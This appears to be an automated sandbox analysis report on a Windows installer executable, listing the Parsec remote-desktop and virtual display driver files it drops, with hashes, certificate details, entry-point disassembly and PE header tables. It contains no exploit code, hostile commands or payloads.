                            Preview:0..N..*.H.........?0..;...1.0...`.H.e......0.....+.....7.....r0..n0...+.....7......i.h..!M.K6..kB...240306184122Z0...+.....7.....0...0.....oX0o ...Vg...$.-. .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0.... 'Fd....#...m0cJ..0.........d..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... 'Fd....#...m0cJ..0.........d..0..........U..,...\.#.s..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0.... ...."..3..6F......$rY..T....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0U..+.....7...1G0E0...+.....7.......010...
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):1311
                            Entropy (8bit):5.255673591625164
                            Encrypted:false
                            SSDEEP:24:fWHjKOUPiE492k6StyO8rKd8tYxrCddcdg1xOjLtxlDxXL6qVt5poZQxWx00:092iEu2kmO/wYxefc61xOjLtxRxWq35y
                            MD5:AC423F3B285C615E7BEC73DC2FA71D20
                            SHA1:A508A10AD7DE55F0EC2CE9C4135CE623B773BF1D
                            SHA-256:E31AEFF7229AD9B63394FB3646F7DFDDE2EA8BBE8B247259A5A9548FE3CD89E3
                            SHA-512:FF2ECBA42697815F906D4E5501F9C4B33CD5652432DFB26302644AD385B40E361C32E0120603002D93DC12B0C38E081D5FF0CCE6145A0420BA0EE70A22FE3B07
                            Malicious:false
                            Preview:;..; Parsec Virtual DS USB filter driver for fixing UDE compatibility with USBAUDIO.SYS..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36FC9E60-C465-11CF-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvirtualds.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvirtualds.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..parsecvirtualds.DriverFiles = 12....[DefaultInstall.NTamd64]..OptionDesc = %parsecvirtualdsServiceDesc%..CopyFiles = parsecvirtualds.DriverFiles....[DefaultUninstall.NTamd64]..LegacyUninstall = 1....[parsecvirtualds.DriverFiles]..parsecvirtualds.sys....[DefaultInstall.NTamd64.Services]..AddService = %parsecvirtualdsServiceName%,,parsecvirtualds.Service....[parsecvirtualds.Service]..DisplayName = %parsecvirtualdsServiceName%..Description = %parsecvirtualdsServiceDesc%..ServiceBinary = %12%\parsecvirtualds.sys..ServiceType = 1 ; SERVICE_KERNEL_DRI
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):26680
                            Entropy (8bit):6.39482709996269
                            Encrypted:false
                            SSDEEP:384:OOq45ajAwai+E3n5bWbkcBnqRTjdfHpl1eUNh3YDX+iR9zYjI:O/45al/RcVw1Hf1zH3YDuO9zyI
                            MD5:0790B2E5B9D6B38B566C6BC796F0364A
                            SHA1:1C87512273F9E98E43EA1B048A67995A93E02B4E
                            SHA-256:4B98D337ED94646D10BDB0395A29D10DCAC50C660C5176C1937A823301BD6CA1
                            SHA-512:03A8E2BE9C98385EC13CDE7EE321AB73235289DE22DEB1029B795392B90A447DFA46182D40CBBC091B39AB0DF8F5A8E9FC7A80F1D839F36EC8C678BDF746844E
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"..C..C..C..;..C..C..C..;..C..C..C..;..C..;..C.....C...5..C.....C.Rich.C.........................PE..d...o..e.........."....&.&..........p..........@....................................[.....`A.................................................q..P............P.......@..8(......<...`5..8........................... 4..@............0...............................text............................... ..h.rdata.......0......................@..H.data........@.......&..............@....pdata.......P.......(..............@..HPAGE....l....`.......*.............. ..`INIT...."....p.......4.............. ..b.rsrc................:..............@..B.reloc..<............>..............@..B........................................................................................................................................................................
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:modified
                            Size (bytes):3549
                            Entropy (8bit):5.36373347255303
                            Encrypted:false
                            SSDEEP:96:QO00eO00erMwUgWUg0B1kE3ZhpJp8ZpkRepk3YpgpNun:QO00eO00erMwmkB1kAa
                            MD5:39BA3CD19F83809E3342490E48164EE6
                            SHA1:98EFEAADB2C862B6F6F359D5EABC6D9C103BAD43
                            SHA-256:2EC08E9934ED59BEF914F7AC9076A92976A66543B69FE95ADDDAEECA314022D0
                            SHA-512:DCCE5ABFA6DF3CB66C5EAB254DC00241464E0F8E623CDACA01EA5FD708B4BA50C670CCB100E46CFA2FD4A79E0C0C119A3B63F5FAD88B6CBA374D7DC46CBA667B
                            Malicious:false
                            Preview:CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6041 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6699 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #4398 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6041 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6699 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #4398 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #2083 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #2459 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: SyncAllDBs Corruption or Schema Change..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #891 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #1307 encountered JET error -1601..CatalogDB: 08:57:12 03/10/2023: SyncDB:: Sync sta
                            Process:C:\Program Files\Parsec\pservice.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):110008
                            Entropy (8bit):6.450823294476483
                            Encrypted:false
                            SSDEEP:1536:KR5Ea4gGk28tEFVZ3t0zfIagnbSLDII+D61SdOkC7P:KHEpgG98KZ3+gbE8pD61JD
                            MD5:BADAC8C897F02A15D3788C6D3A7D6E43
                            SHA1:8E5FF02FB8B98D2D66AFA3ACEB6CA7797B3D040A
                            SHA-256:21342CFB9CFD76F7B1F40A7AF7EF35500AD713964BE8BFB48559715D38B57E22
                            SHA-512:38AF1329D3F154E90A04DACA368AA6203A6225F73976010377E948109624F8D0B2CF7355808E75E6A9472D6195079E968C4D1BA2E1A7BB901093F3FBE2ED690D
                            Malicious:false
                            Preview:0....0.......0...*.H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..241113124751Z..241120124751Z0....0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...*B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!...in.H...[u...]....210602000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!... .}...|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210
                            Process:C:\Program Files\Parsec\pservice.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):110008
                            Entropy (8bit):6.450823294476483
                            Encrypted:false
                            SSDEEP:1536:KR5Ea4gGk28tEFVZ3t0zfIagnbSLDII+D61SdOkC7P:KHEpgG98KZ3+gbE8pD61JD
                            MD5:BADAC8C897F02A15D3788C6D3A7D6E43
                            SHA1:8E5FF02FB8B98D2D66AFA3ACEB6CA7797B3D040A
                            SHA-256:21342CFB9CFD76F7B1F40A7AF7EF35500AD713964BE8BFB48559715D38B57E22
                            SHA-512:38AF1329D3F154E90A04DACA368AA6203A6225F73976010377E948109624F8D0B2CF7355808E75E6A9472D6195079E968C4D1BA2E1A7BB901093F3FBE2ED690D
                            Malicious:false
                            Preview:0....0.......0...*.H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..241113124751Z..241120124751Z0....0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...*B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!...in.H...[u...]....210602000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!... .}...|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210
                            Process:C:\Program Files\Parsec\pservice.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):471
                            Entropy (8bit):7.2391775057961
                            Encrypted:false
                            SSDEEP:12:JyYOY5GLsHxIDJhfxyGFFROABVkhS/m7dUM:JROYILsIfLFFo2VOMm7df
                            MD5:DE60388F3921FE0CD4272D7FC99A4BD9
                            SHA1:4726073B006C9B54CDCB378212DEE2CDD4BD622B
                            SHA-256:9E8579E6133A72D13A0704175FB50353BEF2876E04E0B510D32791E47AC94C31
                            SHA-512:84325EFE7125E5C12ADBFB5EDD96147E3211C8128E02183EFFA7DB9C52255F8CE1FF20EAE5EB50E999CB4A8528EA3F8B4FB09E5FE85478559688C1B208691E0C
                            Malicious:false
                            Preview:0..........0.....+.....0......0...0......E....1-Q...!..m....20241112190516Z0s0q0I0...+...........@..D3=?..Mn8...Q..E....1-Q...!..m..........-...P..@.Z....20241112190516Z....20241119190516Z0...*.H.............lN.u.GpZc..$.rA.H.2..R...w.....y|{|5...W..? x.i..t...~.t.:j..vf^P94.a-.3K..+[......6..jU..l.Q..i.a.T......y....&H .h...9.4T.4.......U.X.9....L...{=Us....1>.w..f@..%....X=M..Z.....9/:.z.....w_iH;./.@........(u.zI........h.B....+.'a...l.)1B.0.V.
                            Process:C:\Program Files\Parsec\pservice.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):727
                            Entropy (8bit):7.559119648888612
                            Encrypted:false
                            SSDEEP:12:5o6Tq9Vc5h44T6YC0r7EnpnS+VKdQcBwAhcaL5vsKDHznWrV/ys4y4k10HQbclA8:5ccfXsnSn7W25E+TWrxgk0HQbclAid3
                            MD5:A5634042EFD3730706BDEE80476B450A
                            SHA1:8ABBFE4869BE217929491545A01C3ED6A7071E18
                            SHA-256:A5A9EF0B62E17CE6AF43E25491E803C00D239B160D068DEC310DEC2F86D9895E
                            SHA-512:8C1C57E7FA4CE47B1592BF44C552191357AC735A5DE5FBC5F0A472F5D9E15F71CB7C38A0F094D64089FA53B58D923A44C7D660C9F7A840C934DEEC50B7A5887D
                            Malicious:false
                            Preview:0..........0.....+.....0......0...0......h7..;._....a{..e.NB..20241113202459Z0s0q0I0...+.........]....^Idk...NG.X....h7..;._....a{..e.NB...h..3P....g..[....20241113200902Z....20241120190902Z0...*.H.............wC...._x.H.....8$4...Q...sB. .!U.........:.....t]...N.*,.T...M...{.g..wlGb,QOOn..o].B.....~.yo.`._.Q..l..a.~D.3.V....O....,.+VQbq.$.6..Y.5.K.?........../w.......V.~.x..KZ.... .f...D.}....z......~S.'/.Q:Ce.".....S_..5...dd.c.S&...@.L.4..5.&..\..h.,..|....zS...4....}._B.;.c.s...*..E.T...F.Hc8...1....-.<..XcFyg{..I......Z7.n........R7T......S..u._......]g.."vn.P.... ..3..rA$.BR..y=....a=.3.vZ_..a..Wg..M.e.b.)..lL..m.f/,..v.O..Y.NLM...........$.1?c....d.T..Q..l....'.`\s.2Z>.g..q..O..a..
                            Process:C:\Program Files\Parsec\pservice.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):727
                            Entropy (8bit):7.55159694457111
                            Encrypted:false
                            SSDEEP:12:5onfZfc5RlRtBfQ9x4hsjfSS97Jrm6FEL2eGszjXvScgwDoJh5oMVmfCw8iATw:5ixcdZOx4hwaSZJnFEbSY6suuCwvATw
                            MD5:50C2ACCA85675897B36B7B4BE3146ABF
                            SHA1:73F0C48A8FB60EC92EBA17C7A901703234CD0F8F
                            SHA-256:0463055A40E90C7B44AE7273A2480F8FC5AC657EB7CDFD2F1D7E44129CCD5E76
                            SHA-512:1902E8B97988E3D68B02047D68686BF3C68B36E262014F0B40EF920D066B83F21FBBACA5EC3B3C37C961FC06EE39A2FAFE42A896D54F1A4FC748A31D71BA3E61
                            Malicious:false
                            Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20241113184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20241113184215Z....20241120184215Z0...*.H.............9....i.3L../9Y...../I.df...'*9....>i..`*};GZq%k...O..P.{...3F.....2r......W[....j........PY.&..h=.T....zY..Y0..Ou.!...1...(.RN....v..&8H.$_H......(.. HX.=..#.3A.'...<..T...1^.ZRx..V....v..y..Y....._.r.eh.[.b...<o./..;8.Vf;K.&6{.3o.0K^.Z.........U....7.*x.A......1...!........u`[SB.5%.y`..~_M..g.i......_..t.1K.<@S.d/6d.f.ya.G....l..rv..@.k}\p...d.........r..(..d..5V..v....5.@7:....#]J..o.H.tT...l.0#Y.y.@..9.Y..T.+.f8A..R.p.8.O+/....>lK...p5).,(.3.#s&.......C.Z.R...Y..a"Q...4....E....
                            Process:C:\Program Files\Parsec\pservice.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):306
                            Entropy (8bit):3.220212386998742
                            Encrypted:false
                            SSDEEP:6:kKDM78OQrI3AUSW0P3PeXJUwh8lmi36lWaTW:bKfQrI3xSW0P3PeXJUZ6JS
                            MD5:4699E9989F734748906A267859D10F52
                            SHA1:1B414C23374606BF27C55B53153552EB81F74099
                            SHA-256:3F74FADB22AEAF2875B0763E25164F9FFEE1E7A015D8A6DE9669D62A58393E5D
                            SHA-512:70156AD52B3D5D97E0AACDEED0E1467FEA99BFD75B2700C6406596514D68E7C88867A1DB7C3FAA9EDF690B7C6380491F26AC83CA2C7BB19BA87FC4ED964D5F4F
                            Malicious:false
                            Preview:p...... .........o6.86..(....................................................... ............5.. ..."...............h.t.t.p.:././.c.r.l.3...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.l...".6.7.3.4.a.6.5.c.-.1.a.d.b.8."...
                            Process:C:\Program Files\Parsec\pservice.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):306
                            Entropy (8bit):3.229215287332609
                            Encrypted:false
                            SSDEEP:6:kKqAJV8OQrIXOAUSW0P3PeXJUwh8lmi36lWaTW:iyVfQrIexSW0P3PeXJUZ6JS
                            MD5:1160901690DC8D967A8A1B439FA57427
                            SHA1:749F64D96B8A3F6C73C4FEBF02E15F9BF9CE4DED
                            SHA-256:4B9326963414219D4B4C8F7822E70A8878CE16139CC66BB986D698ECB0894DC6
                            SHA-512:4F58A2948E6F40A8AC2B887EBC18F674355064945CF626A7348EB1D47C8C903131B25E45701F38BCFE5D5543911653B85B77CBF6FB40A755780228E4A9133048
                            Malicious:false
                            Preview:p...... ........7.3.86..(....................................................... ............5.. ..."...............h.t.t.p.:././.c.r.l.4...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.l...".6.7.3.4.a.6.5.c.-.1.a.d.b.8."...
                            Process:C:\Program Files\Parsec\pservice.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):400
                            Entropy (8bit):3.9274225995733856
                            Encrypted:false
                            SSDEEP:6:kK99/VEk9/IBYFHXlRNfOAUMivhClroFzCJCgO3lwuqDnlyQ4hY5isIlQhZgJn:l9/VAihmxMiv8sFzD3quqDkPh8Y2ZM
                            MD5:3B21741D3AEEC27B411348C68722A338
                            SHA1:EF9864542A4148DC51B566A05F469261260E63F9
                            SHA-256:5F2A462AD9BCF3349407DEC97364A52FC78A19ADF8C6BAE720A006630B6B7531
                            SHA-512:990F16050C78084767FC7765F969DE6844703F3D99E2E4345109DC4EFD28C4273C596B94EDA50B64B375C181572C31F995D420D30BC9B6AC22060B1A7E1E8467
                            Malicious:false
                            Preview:p...... ..........v.86..(................>..55...~...:...................~...:.. ..........d-6.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.3.x.L.4.L.Q.L.X.D.R.D.M.9.P.6.6.5.T.W.4.4.2.v.r.s.U.Q.Q.U.R.e.u.i.r.%.2.F.S.S.y.4.I.x.L.V.G.L.p.6.c.h.n.f.N.t.y.A.8.C.E.A.6.b.G.I.7.5.0.C.3.n.7.9.t.Q.4.g.h.A.G.F.o.%.3.D...
                            Process:C:\Program Files\Parsec\pservice.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):408
                            Entropy (8bit):3.5195697432359827
                            Encrypted:false
                            SSDEEP:6:kKeik9QfOAUMivhClroFHXHDZA6liyZlSlMul0bg3PWovy28lhle6C9o1kn:2irmxMiv8sF3HtllJZIvOP20S9o1k
                            MD5:7FBDF0E5585309643DEC5BADF55E140A
                            SHA1:3E64A3BADDAD6388425BEBD9CDF90DF23506F4AC
                            SHA-256:276735EE85A15DF941E4B7ADD5C286212E118E05DE02DFDD0387138FDFC47BA8
                            SHA-512:73D689CCB23C5403D9119329DE2439E9F0A22909DA08255254C5EAC3E45DD377A6542288C1902E2D29A662FDDF2C0EA591D81A4CCCD2C4A86971B9F5C3F85E37
                            Malicious:false
                            Preview:p...... ....$.....i.86..(....................................................... ........H.r56.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.S.R.X.e.r.F.0.e.F.e.S.W.R.r.i.p.T.g.T.k.c.J.W.M.m.7.i.Q.Q.U.a.D.f.g.6.7.Y.7.%.2.B.F.8.R.h.v.v.%.2.B.Y.X.s.I.i.G.X.0.T.k.I.C.E.A.l.o.E.u.g.z.U.P.G.t.9.O.n.V.Z.%.2.F.P.P.g.l.s.%.3.D...
                            Process:C:\Program Files\Parsec\pservice.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):412
                            Entropy (8bit):3.990411947927068
                            Encrypted:false
                            SSDEEP:6:kK/lNzR1MyFiUfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:lRRBJmxMiv8sFBSfamB3rbFURMOlAkr
                            MD5:CA440612BBB7BDE0C282E5E197EF9659
                            SHA1:EB6CED3ABE211A813EE31B6654773602CFE54424
                            SHA-256:69C7BE1C023E7A7CA6A9426CE408AC18F9A178000EBF3E7CB4C4FD2239B7BF11
                            SHA-512:68D555F5A996FDF913384B7D7330FC5794DCCA4F31AADE3F300E37563D72FB02D69F4FCD6120F75E311DC31D59344A87C50A4274220CD6AE5E08AE9D54BA3DFE
                            Malicious:false
                            Preview:p...... ....(.../.o.86..(.................F..5...]*.{;...................]*.{;.. ..........[-6.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                            Process:C:\Windows\SysWOW64\netsh.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):7
                            Entropy (8bit):2.2359263506290326
                            Encrypted:false
                            SSDEEP:3:t:t
                            MD5:F1CA165C0DA831C9A17D08C4DECBD114
                            SHA1:D750F8260312A40968458169B496C40DACC751CA
                            SHA-256:ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
                            SHA-512:052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
                            Malicious:false
                            Preview:Ok.....
                            Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):70
                            Entropy (8bit):4.898726367124714
                            Encrypted:false
                            SSDEEP:3:tR6QyPKj+wcRCFMLDJOBFXRN8y:fyyCwcZLDJOBFBN8y
                            MD5:E3C1941CBFB3DBDAD9103476189F8F85
                            SHA1:BE404907AAFD3A0F612875CC62628B1A2C2982F3
                            SHA-256:9C62B28C253E3D71051A6AF5C09E924F2096F181DC03C56D8A10CB6E0BA9644A
                            SHA-512:2917A82BE1E1F746AC1A15A82D3CF4628F3DF4898E4474C1309A72B6F6D792725F8FA3CC59C4FFFDFA8241965AD6651B59FAD89C078B49126EDF7474F78E10B1
                            Malicious:false
                            Preview:2024-11-13 20:58:48,646 INFO [default] Driver installed successfully..
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.997278229743437
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 98.45%
                            • Inno Setup installer (109748/4) 1.08%
                            • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            File name:uu8v4UUzTU.exe
                            File size:50'493'432 bytes
                            MD5:2d2f050e6c898065032cb2686a0effca
                            SHA1:0d3c1fbd9b7db74fdb5ee155b610d86319d9fa51
                            SHA256:4c750c11a04f90c9922ace4a237dc256d7e71fa512d4857922cc7d46bb4ba0e9
                            SHA512:5fcd58c259cd020f5b4afe8802a6588e7a942ef53cf5175f6f18c900e8ed7e6b5009370b0b0e06969e4ecc7c26dcd7e8f3318907411fc7df62ccb797ec04f67e
                            SSDEEP:786432:HyiiDc4ImIc9SLIJyNwsNBIRya++/sC89UTh/1m1OO2+3FJRYd17TV+s:SiiD9KL85sNBIRyX0M9gG1OO//2rh+s
                            TLSH:E4B7333B71A4B43FC4AA463A5F73531448B37E91A9C78D2A43E0161CCB25EA01E7A777
                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                            Icon Hash:01020d1930310f3c
                            Entrypoint:0x4b5eec
                            Entrypoint Section:.itext
                            Digitally signed:true
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x6258476F [Thu Apr 14 16:10:23 2022 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:1
                            File Version Major:6
                            File Version Minor:1
                            Subsystem Version Major:6
                            Subsystem Version Minor:1
                            Import Hash:e569e6f445d32ba23766ad67d1e3787f
                            Signature Valid:false
                            Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                            Signature Validation Error:A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file
                            Error Number:-2146762495
                            Not Before, Not After
                            • 29/08/2024 02:06:14 28/08/2025 20:23:48
                            Subject Chain
                            • OID.1.3.6.1.4.1.311.60.2.1.3=KE, OID.2.5.4.15=Private Organization, CN=KEMROSE ENTERPRISES LTD, SERIALNUMBER=CPR/2010/34857, O=KEMROSE ENTERPRISES LTD, L=Nairobi, S=Nairobi, C=KE
                            Version:3
                            Thumbprint MD5:6E17F82AC2A84546205F6D343FA436A5
                            Thumbprint SHA-1:E1AA448D29371254654C29C65A5309686ACD93D0
                            Thumbprint SHA-256:A89FF2FD4D4690D199C5DAC33F5EF7D9DBB10069213FD2A60389870CE960CF27
                            Serial:1BF8761F7761C3FDB27BF20B88C21357
                            Instruction
                            push ebp
                            mov ebp, esp
                            add esp, FFFFFFA4h
                            push ebx
                            push esi
                            push edi
                            xor eax, eax
                            mov dword ptr [ebp-3Ch], eax
                            mov dword ptr [ebp-40h], eax
                            mov dword ptr [ebp-5Ch], eax
                            mov dword ptr [ebp-30h], eax
                            mov dword ptr [ebp-38h], eax
                            mov dword ptr [ebp-34h], eax
                            mov dword ptr [ebp-2Ch], eax
                            mov dword ptr [ebp-28h], eax
                            mov dword ptr [ebp-14h], eax
                            mov eax, 004B14B8h
                            call 00007F2AD05CB935h
                            xor eax, eax
                            push ebp
                            push 004B65E2h
                            push dword ptr fs:[eax]
                            mov dword ptr fs:[eax], esp
                            xor edx, edx
                            push ebp
                            push 004B659Eh
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            mov eax, dword ptr [004BE634h]
                            call 00007F2AD066E427h
                            call 00007F2AD066DF7Ah
                            lea edx, dword ptr [ebp-14h]
                            xor eax, eax
                            call 00007F2AD05E13D4h
                            mov edx, dword ptr [ebp-14h]
                            mov eax, 004C1D84h
                            call 00007F2AD05C6527h
                            push 00000002h
                            push 00000000h
                            push 00000001h
                            mov ecx, dword ptr [004C1D84h]
                            mov dl, 01h
                            mov eax, dword ptr [004238ECh]
                            call 00007F2AD05E2557h
                            mov dword ptr [004C1D88h], eax
                            xor edx, edx
                            push ebp
                            push 004B654Ah
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            call 00007F2AD066E4AFh
                            mov dword ptr [004C1D90h], eax
                            mov eax, dword ptr [004C1D90h]
                            cmp dword ptr [eax+0Ch], 01h
                            jne 00007F2AD06746CAh
                            mov eax, dword ptr [004C1D90h]
                            mov edx, 00000028h
                            call 00007F2AD05E2E4Ch
                            mov edx, dword ptr [004C1D90h]
                             Name | Virtual Address | Virtual Size | Is in Section
                             IMAGE_DIRECTORY_ENTRY_EXPORT | 0xc4000 | 0x9a | .edata
                             IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc2000 | 0xfdc | .idata
                             IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x1e5a0 | .rsrc
                             IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
                             IMAGE_DIRECTORY_ENTRY_SECURITY | 0x3026938 | 0xec0 | -
                             IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
                             IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
                             IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
                             IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
                             IMAGE_DIRECTORY_ENTRY_TLS | 0xc6000 | 0x18 | .rdata
                             IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
                             IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
                             IMAGE_DIRECTORY_ENTRY_IAT | 0xc22f4 | 0x254 | .idata
                             IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xc3000 | 0x1a4 | .didata
                             IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
                             IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
                             Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                             .text | 0x1000 | 0xb39e4 | 0xb3a00 | 43af0a9476ca224d8e8461f1e22c94da | False | 0.34525867693110646 | data | 6.357635049994181 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
